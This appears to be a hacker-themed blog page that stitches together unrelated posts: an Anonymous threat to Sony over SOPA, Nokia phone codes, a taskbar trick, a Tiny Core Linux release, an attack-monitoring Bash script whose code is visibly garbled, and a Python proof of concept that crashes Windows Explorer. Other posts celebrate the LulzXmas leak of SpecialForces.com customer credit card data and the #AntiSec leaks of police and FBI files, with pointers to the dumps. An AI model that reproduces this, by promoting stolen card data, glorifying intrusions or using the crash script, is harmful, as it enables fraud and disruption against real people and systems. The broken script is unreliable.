Anonymous: Message to SONY on SOPA

Hello, SONY.
We are Anonymous.

It has come to the attention of the Anonymous activist community that you have chosen to stand by the Stop Online Piracy Act. This act will halt online businesses and restrict access to many sites for many users. Supporting SOPA is like trying to throw an entire company from off a bridge. Your support to the act is a signed death warrant to SONY Company and Associates. Therefore, yet again, we have decided to destroy your network. We will dismantle your phantom from the internet. Prepare to be extinguished. Justice will be swift, and it will be for the people, whether some like it or not. Sony, you have been warned.
To those doubting our powers. We’ve infiltrated the servers of Bank of America, The United States Department of Defense, The United Nations, and Lockheed Martin. In one day.For their approval to SOPA, we have also declared that our fury be brought upon the following persons. Justin Bieber. Lady Gaga. Kim Kardashian. and Taylor Swift.

Operation Blackout, engaged.
Operation Mayhem, engaged.
Operation LulzXmas, engaged.

We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.

Supporters of SOPA, you should’ve expected us.

List of Nokia mobile phone secret codes

*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
*#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair – if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# Enhanced Full Rate Codec (EFR) activation.
Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370*- (EFR) deactivation.
Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# Half Rate Codec activation.
*#4720* Half Rate Codec deactivation. The phone will automatically restart.
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
*#7328748263373738# resets security code.
*#21# Allows you to check the number that “All Calls” are diverted to
*#30# Lets you see the private number
*#43# Allows you to check the “Call Waiting” status of your phone.
*#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to.
*#67# Allows you to check the number that “On Busy Calls” are diverted to.
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible
*#7780# Restore factory settings
*#8110# Software version for the nokia 8110
*#92702689# Displays – Serial Number, Date Made, Purchase Date, Date of last repair (0000 for no repairs), Transfer User Data.

Trick to Show Your name after time in taskbar

Try this trick to add up ur name in place of AM and PM beside time.
Its simple:
Step-1:
– Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok …

Did It change?
If not, follow step-2 below.
Step2:
– Now go to time in taskbar and Double Click it to open “Date and time property” …
Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY 8)

LulzXmas continues: Anonymous hits law enforcement store SpecialForces.com, plunder customer cc database leaked!

Ho Ho Ho…
After hacked million of docs from Stratfor, one of the the main intelligence sources for the US military.
Now Anonymous LulzXmas hits law enforcement store SpecialForces.com.
One of Anonymous user tweeting if they are hacked SpecialForces.com like this :

“@YourAnonNews: LulzXmas continues: Anonymous hits law enforcement store http://SpecialForces.com (@SFGear), plunder customer cc database | http://pastebin.com/vuMypejL”

And you can read the data here.

Merry LulzXmas everyone…
Ho Ho Ho.. o<{:^]
😀 😛 😀 😀

don't f0rget follow my twitter @v0ldem0rT_
thx 😀

Team Tiny Core is proud to announce the release of Core 4.2. The main theme for the 4.2 release is the re-factoring of Tiny Core Linux to be highly modular by focusing on its core. With the Core project one starts with the kernel (vmlinuz 2.4 MB) and core.gz 5 MB. Micro Core 8 MB is simply the kernel + core.gz – this is the foundation for user created desktops. Tiny Core is simply the kernel + core.gz + Xvesa.tcz or Xorg.tcz + Xprogs + fltk-1.10.tcz + (user’s choice of window manager) + wbar.tcz. The original Tiny Core becomes simply an example of what the Core project can produce, a 12 MB GUI desktop. 4.2 also introduces Core Plus, a simple way to get started using the Core philosophy with its included community-packaged extensions.
I think this is cute distro LOL 😛

# Download Tiny Core 4.2 Torrent
Info Hash:
b01830641012bbc345cac3d344db584114f418cc

# Source.

Looping Through a List of Signatures in a Bash Script

When you write scripts for administrative purposes, often you may want to evaluate a list and then take actions based on the list.
This script is an example of that process and is designed to be a script used by a Nagios server to monitor and respond to web site attacks.
The heart of the script is this loop which compares each signature in a list to log files looking for a match.

for i in $(awk ‘{print}’ > /tmp/attack
done

This script is a simple example of creating a script that monitors a number of attack signatures focused on a web site.
Once the attack has been recognized the script is designed to respond to the attack by blocking the attacker IP Address , notifying administrators and then resetting the check ready for the next attack, thus MRNR (Monitor, Respond, Notify, Reset).

cfg=”/usr/local/nagios/etc/send_nsca.cfg”
logfile=”/var/log/httpd/access_log”
attacksig=attacksig.txt
badip=”/etc/banned”
rm -f /tmp/attack
for i in $(awk ‘{print}’ > /tmp/attack
done
x=$(egrep “1|2″ /tmp/attack | wc -l)
if [ $x -eq 0 ]
then
cmd=”bash;Pass-WebMultAttack;0;All Systems Look OK”
else
cmd=”bash;Pass-WebMultAttack;2;ATTACK UNDER WAY: DEFENSIVE ACTIONS BEING TAKEN”
fi
grep $attacksig $logfile | awk ‘{ print $1 }’ >> /etc/banned
# THIS SECTION COMMENTED TO STOP BLOCKING IN DEMO
banned=$( grep -v -E “^#” $badip )
for ip in $banned
do
iptables -I INPUT -p tcp -s $ip -j DROP
done
exit $stateid

Understanding the Script
cfg=”/usr/local/nagios/etc/send_nsca.cfg”

This line points to the configuration file that contains the password and encryption method for connection to the Nagios server. [Read full story…]

Windows Explorer Denial Of Service (DoS)

# Windows 2008 SP2 RC2 Explorer Go Byebye 😛
# Windows 7 Pro SP1 Explorer Go Byebye 😛
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stackfrom win32com.shell import shell, shellcon from os import mkdirtry:
mkdir(“c:\\trigger_alt”)
except:
print “[!] Trigger Directory Exists”try:mkdir(“c:\\trigger_alt\\….”)
except:
print “[!] Trigger Sub Directory Exists”print “[!] Triggering Issue”
# This moves the directory containing the sub directory which creates the # The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ….\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,’c:\\trigger_alt’,None,shellcon.FOF_NOCONFIRMATION))

# Download The txt here.

# Source.

The #AntiSec embassy

# [*] Fuck FBI Friday V: Cybercrime Investigators Exposed #18/11/2011 #
~ [browse files]

# [*] International Association of Chiefs of Police Owned #22/10/2011#
~ [browse files]

[*] Chinga La Migra IV: Texas Takedown Thursday #1/9/2011#
~ [Zone-h.org Mirror]

# [*] Fuck FBI Friday IV: Vanguard Defense Industries #9/8/2011 #
~ [download The Torrent]

# [*] Corrupt Brazil (Satiagraha) #10/8/2011#
~ [download The Torrent]

# You can see more #AntiSec embassy in here.

Keep secure. Keep Anonymously.
We are Anonymous.
We are don’t forget.
We are don’t forgive.
Expect us. Alaways.

Follow Anonymous Leader => @anonymouSabu!
😀